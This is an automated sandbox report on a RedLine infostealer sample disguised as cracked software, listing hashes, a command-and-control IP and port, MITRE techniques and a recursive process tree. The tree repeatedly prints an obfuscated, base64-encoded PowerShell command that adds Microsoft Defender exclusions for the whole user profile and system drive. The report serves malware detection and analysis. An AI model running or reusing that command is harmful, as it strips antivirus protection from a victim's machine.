redline | d4bae32272d4b78710e2546c787a5301135cdc3bbc89dde41fc32b5ff1b1374b

Analysis

max time kernel
232s
max time network
1723s
platform
windows11-21h2_x64
resource
win11-20241023-en
resource tags

arch:x64arch:x86image:win11-20241023-enlocale:en-usos:windows11-21h2-x64system
submitted
30-11-2024 16:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

RogueV6.3cracked.exe
Size

13.6MB
MD5

ed475b5614b57bb769d9475bab408bb2
SHA1

a4496180da8930ea4b50f6b7e08e48cf4d093a43
SHA256

d4bae32272d4b78710e2546c787a5301135cdc3bbc89dde41fc32b5ff1b1374b
SHA512

88842132f2a486a34b4766d4b0092856fc3313895612f8aa613914acb5d32114ee033744c473b9ab28ec5f9f3e6e31980c85139f9f7dafdc4614b67f496403ce
SSDEEP

196608:/Qx1aFKgrjL4HwYJTPV+abRdGHMICWi0fNkn6zTetKvIy5nQmy:/Y1EDjL4QYJTQabRdGHvCWi0l6O+Kw

Score

10^/10

redline nou defense_evasion discovery infostealer

Malware Config

Extracted

Family

redline

Botnet

NOu

135.236.153.9:1912

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 2 IoCs

resource	yara_rule
behavioral1/files/0x001c00000002aaa7-4.dat	family_redline
behavioral1/memory/2972-12-0x0000000000510000-0x0000000000562000-memory.dmp	family_redline

Redline family
redline

Executes dropped EXE 64 IoCs

pid	Process
2972	build (4).exe
3692	build (4).exe
4956	build (4).exe
2576	build (4).exe
4452	build (4).exe
1972	build (4).exe
4756	build (4).exe
2672	build (4).exe
2740	build (4).exe
4996	build (4).exe
1912	build (4).exe
1852	build (4).exe
1188	build (4).exe
4392	build (4).exe
664	build (4).exe
5284	build (4).exe
5540	build (4).exe
5772	build (4).exe
6096	build (4).exe
5068	build (4).exe
4864	build (4).exe
5948	build (4).exe
1628	build (4).exe
5552	build (4).exe
3008	build (4).exe
5168	build (4).exe
3020	build (4).exe
784	build (4).exe
6216	build (4).exe
6512	build (4).exe
6720	build (4).exe
6960	build (4).exe
7136	build (4).exe
6156	build (4).exe
6624	build (4).exe
3684	build (4).exe
6668	build (4).exe
7000	build (4).exe
6684	build (4).exe
3852	build (4).exe
1416	build (4).exe
1600	build (4).exe
7064	build (4).exe
4380	build (4).exe
6020	build (4).exe
4720	build (4).exe
5644	build (4).exe
6032	build (4).exe
4044	build (4).exe
2636	build (4).exe
1868	build (4).exe
5968	build (4).exe
1076	build (4).exe
1992	build (4).exe
5064	build (4).exe
6588	build (4).exe
5460	build (4).exe
3656	build (4).exe
6284	build (4).exe
6880	build (4).exe
3832	build (4).exe
7160	build (4).exe
1104	build (4).exe
3764	build (4).exe

Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 3 IoCs

pid	pid_target	Process	procid_target
14536	17148	Process not Found	2699
17400	16760	Process not Found	2703
8420	12112	Process not Found	2492

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	build (4).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RogueV6.3cracked.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RogueV6.3cracked.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RogueV6.3cracked.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RogueV6.3cracked.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RogueV6.3cracked.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	build (4).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RogueV6.3cracked.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RogueV6.3cracked.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RogueV6.3cracked.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	build (4).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	build (4).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RogueV6.3cracked.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	build (4).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RogueV6.3cracked.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RogueV6.3cracked.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RogueV6.3cracked.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RogueV6.3cracked.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	build (4).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RogueV6.3cracked.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RogueV6.3cracked.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	build (4).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RogueV6.3cracked.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RogueV6.3cracked.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RogueV6.3cracked.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RogueV6.3cracked.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RogueV6.3cracked.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RogueV6.3cracked.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	build (4).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RogueV6.3cracked.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	build (4).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	build (4).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	build (4).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RogueV6.3cracked.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	build (4).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RogueV6.3cracked.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	build (4).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RogueV6.3cracked.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	build (4).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	build (4).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	build (4).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RogueV6.3cracked.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RogueV6.3cracked.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2528	powershell.exe
5020	powershell.exe
2528	powershell.exe
2724	powershell.exe
5020	powershell.exe
1456	powershell.exe
2724	powershell.exe
720	powershell.exe
2412	powershell.exe
1456	powershell.exe
4892	powershell.exe
4892	powershell.exe
720	powershell.exe
720	powershell.exe
2412	powershell.exe
2412	powershell.exe
3304	powershell.exe
3304	powershell.exe
1796	powershell.exe
1796	powershell.exe
4892	powershell.exe
2108	powershell.exe
2108	powershell.exe
3304	powershell.exe
4644	powershell.exe
4644	powershell.exe
1796	powershell.exe
2008	powershell.exe
2008	powershell.exe
2108	powershell.exe
3328	powershell.exe
3328	powershell.exe
4644	powershell.exe
4768	powershell.exe
4768	powershell.exe
2008	powershell.exe
4952	powershell.exe
4952	powershell.exe
3328	powershell.exe
5276	powershell.exe
5276	powershell.exe
4768	powershell.exe
5532	powershell.exe
5532	powershell.exe
4952	powershell.exe
5764	powershell.exe
5764	powershell.exe
5276	powershell.exe
6088	powershell.exe
6088	powershell.exe
5532	powershell.exe
5324	powershell.exe
5324	powershell.exe
5764	powershell.exe
1792	powershell.exe
1792	powershell.exe
6088	powershell.exe
5572	powershell.exe
5572	powershell.exe
5324	powershell.exe
5196	powershell.exe
5196	powershell.exe
1792	powershell.exe
5572	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2528	powershell.exe
Token: SeDebugPrivilege	5020	powershell.exe
Token: SeDebugPrivilege	2724	powershell.exe
Token: SeDebugPrivilege	1456	powershell.exe
Token: SeDebugPrivilege	720	powershell.exe
Token: SeDebugPrivilege	2412	powershell.exe
Token: SeDebugPrivilege	4892	powershell.exe
Token: SeDebugPrivilege	3304	powershell.exe
Token: SeDebugPrivilege	1796	powershell.exe
Token: SeDebugPrivilege	2108	powershell.exe
Token: SeDebugPrivilege	4644	powershell.exe
Token: SeDebugPrivilege	2008	powershell.exe
Token: SeDebugPrivilege	3328	powershell.exe
Token: SeDebugPrivilege	4768	powershell.exe
Token: SeDebugPrivilege	4952	powershell.exe
Token: SeDebugPrivilege	5276	powershell.exe
Token: SeDebugPrivilege	5532	powershell.exe
Token: SeDebugPrivilege	5764	powershell.exe
Token: SeDebugPrivilege	6088	powershell.exe
Token: SeDebugPrivilege	5324	powershell.exe
Token: SeDebugPrivilege	1792	powershell.exe
Token: SeDebugPrivilege	5572	powershell.exe
Token: SeDebugPrivilege	5196	powershell.exe
Token: SeDebugPrivilege	2636	powershell.exe
Token: SeDebugPrivilege	1984	powershell.exe
Token: SeDebugPrivilege	2348	powershell.exe
Token: SeDebugPrivilege	5160	powershell.exe
Token: SeDebugPrivilege	920	powershell.exe
Token: SeDebugPrivilege	6196	powershell.exe
Token: SeDebugPrivilege	6488	powershell.exe
Token: SeDebugPrivilege	6712	powershell.exe
Token: SeDebugPrivilege	6948	powershell.exe
Token: SeDebugPrivilege	7128	powershell.exe
Token: SeDebugPrivilege	6152	powershell.exe
Token: SeDebugPrivilege	6620	powershell.exe
Token: SeDebugPrivilege	5892	powershell.exe
Token: SeDebugPrivilege	7096	powershell.exe
Token: SeDebugPrivilege	7080	powershell.exe
Token: SeDebugPrivilege	5656	powershell.exe
Token: SeDebugPrivilege	4284	powershell.exe
Token: SeDebugPrivilege	1596	powershell.exe
Token: SeDebugPrivilege	5568	powershell.exe
Token: SeDebugPrivilege	4212	powershell.exe
Token: SeDebugPrivilege	956	powershell.exe
Token: SeDebugPrivilege	2812	powershell.exe
Token: SeDebugPrivilege	3636	powershell.exe
Token: SeDebugPrivilege	5292	powershell.exe
Token: SeDebugPrivilege	5752	powershell.exe
Token: SeDebugPrivilege	1836	powershell.exe
Token: SeDebugPrivilege	2828	powershell.exe
Token: SeDebugPrivilege	6080	powershell.exe
Token: SeDebugPrivilege	6928	powershell.exe
Token: SeDebugPrivilege	5132	powershell.exe
Token: SeDebugPrivilege	2288	powershell.exe
Token: SeDebugPrivilege	3368	powershell.exe
Token: SeDebugPrivilege	1596	powershell.exe
Token: SeDebugPrivilege	6856	powershell.exe
Token: SeDebugPrivilege	1512	powershell.exe
Token: SeDebugPrivilege	6072	powershell.exe
Token: SeDebugPrivilege	6660	powershell.exe
Token: SeDebugPrivilege	3780	powershell.exe
Token: SeDebugPrivilege	5832	powershell.exe
Token: SeDebugPrivilege	5332	powershell.exe
Token: SeDebugPrivilege	6656	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2480 wrote to memory of 2528	2480	RogueV6.3cracked.exe	79
PID 2480 wrote to memory of 2528	2480	RogueV6.3cracked.exe	79
PID 2480 wrote to memory of 2528	2480	RogueV6.3cracked.exe	79
PID 2480 wrote to memory of 2972	2480	RogueV6.3cracked.exe	81
PID 2480 wrote to memory of 2972	2480	RogueV6.3cracked.exe	81
PID 2480 wrote to memory of 2972	2480	RogueV6.3cracked.exe	81
PID 2480 wrote to memory of 984	2480	RogueV6.3cracked.exe	82
PID 2480 wrote to memory of 984	2480	RogueV6.3cracked.exe	82
PID 2480 wrote to memory of 984	2480	RogueV6.3cracked.exe	82
PID 984 wrote to memory of 5020	984	RogueV6.3cracked.exe	83
PID 984 wrote to memory of 5020	984	RogueV6.3cracked.exe	83
PID 984 wrote to memory of 5020	984	RogueV6.3cracked.exe	83
PID 984 wrote to memory of 3692	984	RogueV6.3cracked.exe	84
PID 984 wrote to memory of 3692	984	RogueV6.3cracked.exe	84
PID 984 wrote to memory of 3692	984	RogueV6.3cracked.exe	84
PID 984 wrote to memory of 1388	984	RogueV6.3cracked.exe	86
PID 984 wrote to memory of 1388	984	RogueV6.3cracked.exe	86
PID 984 wrote to memory of 1388	984	RogueV6.3cracked.exe	86
PID 1388 wrote to memory of 2724	1388	RogueV6.3cracked.exe	87
PID 1388 wrote to memory of 2724	1388	RogueV6.3cracked.exe	87
PID 1388 wrote to memory of 2724	1388	RogueV6.3cracked.exe	87
PID 1388 wrote to memory of 4956	1388	RogueV6.3cracked.exe	89
PID 1388 wrote to memory of 4956	1388	RogueV6.3cracked.exe	89
PID 1388 wrote to memory of 4956	1388	RogueV6.3cracked.exe	89
PID 1388 wrote to memory of 1572	1388	RogueV6.3cracked.exe	90
PID 1388 wrote to memory of 1572	1388	RogueV6.3cracked.exe	90
PID 1388 wrote to memory of 1572	1388	RogueV6.3cracked.exe	90
PID 1572 wrote to memory of 1456	1572	RogueV6.3cracked.exe	481
PID 1572 wrote to memory of 1456	1572	RogueV6.3cracked.exe	481
PID 1572 wrote to memory of 1456	1572	RogueV6.3cracked.exe	481
PID 1572 wrote to memory of 2576	1572	RogueV6.3cracked.exe	92
PID 1572 wrote to memory of 2576	1572	RogueV6.3cracked.exe	92
PID 1572 wrote to memory of 2576	1572	RogueV6.3cracked.exe	92
PID 1572 wrote to memory of 1812	1572	RogueV6.3cracked.exe	118
PID 1572 wrote to memory of 1812	1572	RogueV6.3cracked.exe	118
PID 1572 wrote to memory of 1812	1572	RogueV6.3cracked.exe	118
PID 1812 wrote to memory of 720	1812	RogueV6.3cracked.exe	95
PID 1812 wrote to memory of 720	1812	RogueV6.3cracked.exe	95
PID 1812 wrote to memory of 720	1812	RogueV6.3cracked.exe	95
PID 1812 wrote to memory of 4452	1812	RogueV6.3cracked.exe	96
PID 1812 wrote to memory of 4452	1812	RogueV6.3cracked.exe	96
PID 1812 wrote to memory of 4452	1812	RogueV6.3cracked.exe	96
PID 1812 wrote to memory of 3460	1812	RogueV6.3cracked.exe	98
PID 1812 wrote to memory of 3460	1812	RogueV6.3cracked.exe	98
PID 1812 wrote to memory of 3460	1812	RogueV6.3cracked.exe	98
PID 3460 wrote to memory of 2412	3460	RogueV6.3cracked.exe	99
PID 3460 wrote to memory of 2412	3460	RogueV6.3cracked.exe	99
PID 3460 wrote to memory of 2412	3460	RogueV6.3cracked.exe	99
PID 3460 wrote to memory of 1972	3460	RogueV6.3cracked.exe	100
PID 3460 wrote to memory of 1972	3460	RogueV6.3cracked.exe	100
PID 3460 wrote to memory of 1972	3460	RogueV6.3cracked.exe	100
PID 3460 wrote to memory of 3004	3460	RogueV6.3cracked.exe	101
PID 3460 wrote to memory of 3004	3460	RogueV6.3cracked.exe	101
PID 3460 wrote to memory of 3004	3460	RogueV6.3cracked.exe	101
PID 3004 wrote to memory of 4892	3004	RogueV6.3cracked.exe	103
PID 3004 wrote to memory of 4892	3004	RogueV6.3cracked.exe	103
PID 3004 wrote to memory of 4892	3004	RogueV6.3cracked.exe	103
PID 3004 wrote to memory of 4756	3004	RogueV6.3cracked.exe	104
PID 3004 wrote to memory of 4756	3004	RogueV6.3cracked.exe	104
PID 3004 wrote to memory of 4756	3004	RogueV6.3cracked.exe	104
PID 3004 wrote to memory of 2148	3004	RogueV6.3cracked.exe	106
PID 3004 wrote to memory of 2148	3004	RogueV6.3cracked.exe	106
PID 3004 wrote to memory of 2148	3004	RogueV6.3cracked.exe	106
PID 2148 wrote to memory of 3304	2148	RogueV6.3cracked.exe	107

C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2480
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2528
- C:\Users\Admin\AppData\Local\Temp\build (4).exe
  "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
  2⤵
  - Executes dropped EXE
  PID:2972
- C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
  "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:984
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5020
- - C:\Users\Admin\AppData\Local\Temp\build (4).exe
    "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
    3⤵
    - Executes dropped EXE
    PID:3692
- - C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
    "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1388
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2724
  - - C:\Users\Admin\AppData\Local\Temp\build (4).exe
      "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
      4⤵
      Executes dropped EXE
      PID:4956
  - - C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
      "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1572
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1456
    - - C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        5⤵
        Executes dropped EXE
        
        PID:2576
    - - C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1812
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:720
      - C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        6⤵
        Executes dropped EXE
        
        PID:4452
      - C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3460
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2412
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        7⤵
        Executes dropped EXE
        
        PID:1972
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:3004
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        8⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4892
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        8⤵
        Executes dropped EXE
        
        PID:4756
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:2148
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        9⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3304
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        9⤵
        Executes dropped EXE
        
        PID:2672
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:3604
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
